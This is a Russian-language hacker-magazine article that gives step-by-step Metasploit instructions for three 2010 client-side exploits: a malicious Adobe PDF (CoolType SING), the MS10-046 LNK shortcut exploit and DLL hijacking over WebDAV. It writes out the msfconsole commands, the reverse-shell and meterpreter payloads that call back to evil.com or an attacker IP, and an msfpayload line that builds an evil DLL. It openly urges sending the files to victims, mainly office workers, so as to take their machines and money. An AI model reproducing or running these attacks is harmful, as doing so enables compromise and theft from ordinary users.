Компьютеры
теперь везде и вся. Несчастных
юзеров полным-полно. Почему
несчастных? Да потому что во
многом они стали основной целью
для "хакерских атак" :).
Особенно с развитием всяких
систем переводов, интернет-банкинга и других видов
электронных денег. Теперь снять
профит с обычного юзера – не
проблема. И это уже не считая
классики типа спама, ботнетов,
DoS’ов, кражи конфиденциально
информации. Антивирусы, фаеры,
IDS’ы, системы обновления ПО,
сэндбоксы спасают только
небольшую толпу продвинутых
юзеров/фирм, так как их надо и
настроить, и правильно
реагировать на угрозы, и купить
само ПО. В итоге имеем широкий
выбор из миллионов
менеджеров/бухгалтеров для
"работы" с ними :).

А тут еще
и реально критические уязвимости
от таких контор, как Microsoft и
Adobe, чье ПО является де-факто
стандартом по миру. Да, в этом
смысле лето было богатым!
В качестве примера я приведу три
сплоита: Adobe Acrobat PDF
Cooltype Sing (версии
<=9.3.4/8.2.4), MS DLL
Hijacking, MS LNK
сплоит(MS10-046). Описание
подробностей сплоитов ты можешь
прочитать в "Обзоре эксплойтов"
от Алексея Синцова в этом и в
прошлом номерах.

Как ни странно, все примеры
реализованы с помощью Metasploit
Framework. Тут надо отдать
должное создателям MSF – они
чрезвычайно быстро стали
добавлять сплоиты к самым
массовым критическим
уязвимостям. Некоторые
реализации уязвимостей и вовсе
появляются сразу в MSF, без
сторонних PoC’ов. Все три
перечисленные уязвимости были
0-day, когда попали в MSF.
Сейчас уже есть кое-какие патчи,
но вернемся к делу.

1) Adobe
Acrobat PDF Cooltype Sing. Adobe
этим летом дал миру несколько
суровых дыр. Это одна из них.
Заходим в msfconsole и:

Выбираем сплоит:

msf >
use
exploit/windows/fileformat/adobe_cooltype_sing

Задаем имя файла:

msf >
set
FILENAME xakep_ubileinyi_vypusk.pdf

Куда сохраняем? В home:

msf >
set
OUTPUTPATH ~

Выбираем нагрузку и ее
настройки:

msf >
set
PAYLOAD
windows/shell/reverse_tcp
msf > set
LHOST evil.com
msf > set
LPORT 80

Теперь на наш evil.com вешаем
netcat, например, и посылаем
жертве файлик по почте. Простой
реверсовый шелл нужен,
во-первых, чтобы обойти NAT,
файер, а во-вторых, чтобы не
привязываться к процессу (чтобы
соединение не оборвалось при
закрытии Acrobat Reader’а).

Есть аналогичный сплоит, но
проводящий атаку через браузер и
Adobe’овский плагин к нему –
exploit/windows/browser/adobe_cooltype_sing.

2) MS LNK
сплоит (MS10-046). Сплоит из
разряда фич 🙂

Выбираем сплоит:

msf >use
windows/browser/ms10_046_shortcut_icon_dllloader

Настраиваем пэйлоад:

msf >set
PAYLOAD
windows/meterpreter/reverse_tcp
msf >set
LHOST
192.168
.0.101

По сути, сплоит поднимает
WebDAV и кидает туда ярлыки. В
результате либо даем бедному
пользователю полученную ссылку,
либо делаем ярлычок на ресурс.
То есть сплоит из локального
стал удаленным (через шару и
WebDAV). Павним бедного юзера –
ему вряд ли что-то поможет :).
Злую DLL’ку для этого и
следующего сплоита можно создать
и ручками. Ярлычок, понятное
дело, тоже.



$msfpayload

windows/meterpreter/reverse_tcp
LHOST=192.168.0.101
D > evil.dll

Где

  • windows/meterpreter/reverse_tcp
    – название нагрузки,
  • LHOST=192.168.0.101 –
    настройки
  • D – указываем, что
    создаем DLL’ку;
  • evil.dll – имя итогового
    файла.

3) MS DLL
Hijacking

Это очень забавная вещь! С ее
помощью мы фактически можем
"превратить" любой миролюбивый
формат файла во что-то злое.
Пришлют тебе файлы с
какой-нибудь презентацией или
чертежами AutoCAD’а, например. А
среди них какая-то библиотечка
валяется. Бывает ведь. Ты,
конечно же, запустишь сам
чертеж, а тут – бац! – и у тебя
бэкдор. Хорошее дело!
Подробное описание "почему и
зачем так" смотри на следующей
странице у Алексея Синцова :).

А теперь – немного практики.

Выбираем сплоит:

msf >
use
windows/browser/webdav_dll_hijacker

Задаем имя файлов:

msf >
set
BASENAME policy

Задаем расширение файла:

msf >
set
EXTENSIONS ppt

Имя для шары:

msf >
set
SHARENAME docs

Нагрузка:

msf >
set
PAYLOAD windows/meterpreter/bind_tcp

После этого либо впариваем
жертве ссылку на шару –
\\192.168.0.101\docs\, либо на
HTTP-сервак – http://192.168.0.101:80.
Жертва открывает файлик – мы
получаем шелл. Честный обмен :).

Опять же, по сути, локальная
уязвимость превратилась в
удаленную за счет шары и WebDAV.
Вот такими тремя client-site
багами мы можем положить на
лопатки все версии Windows, от
XP до 7. Антивири и файеры –
тоже не помеха при небольших
доработках методов :).

Оставить мнение

Check Also

Что можно сделать с iPhone, зная пасскод. Как сливают данные, уводят iCloud и блокируют остальные устройства

Последние несколько месяцев мы много писали о нововведениях в iOS 11. «Теперь-то заживем!»…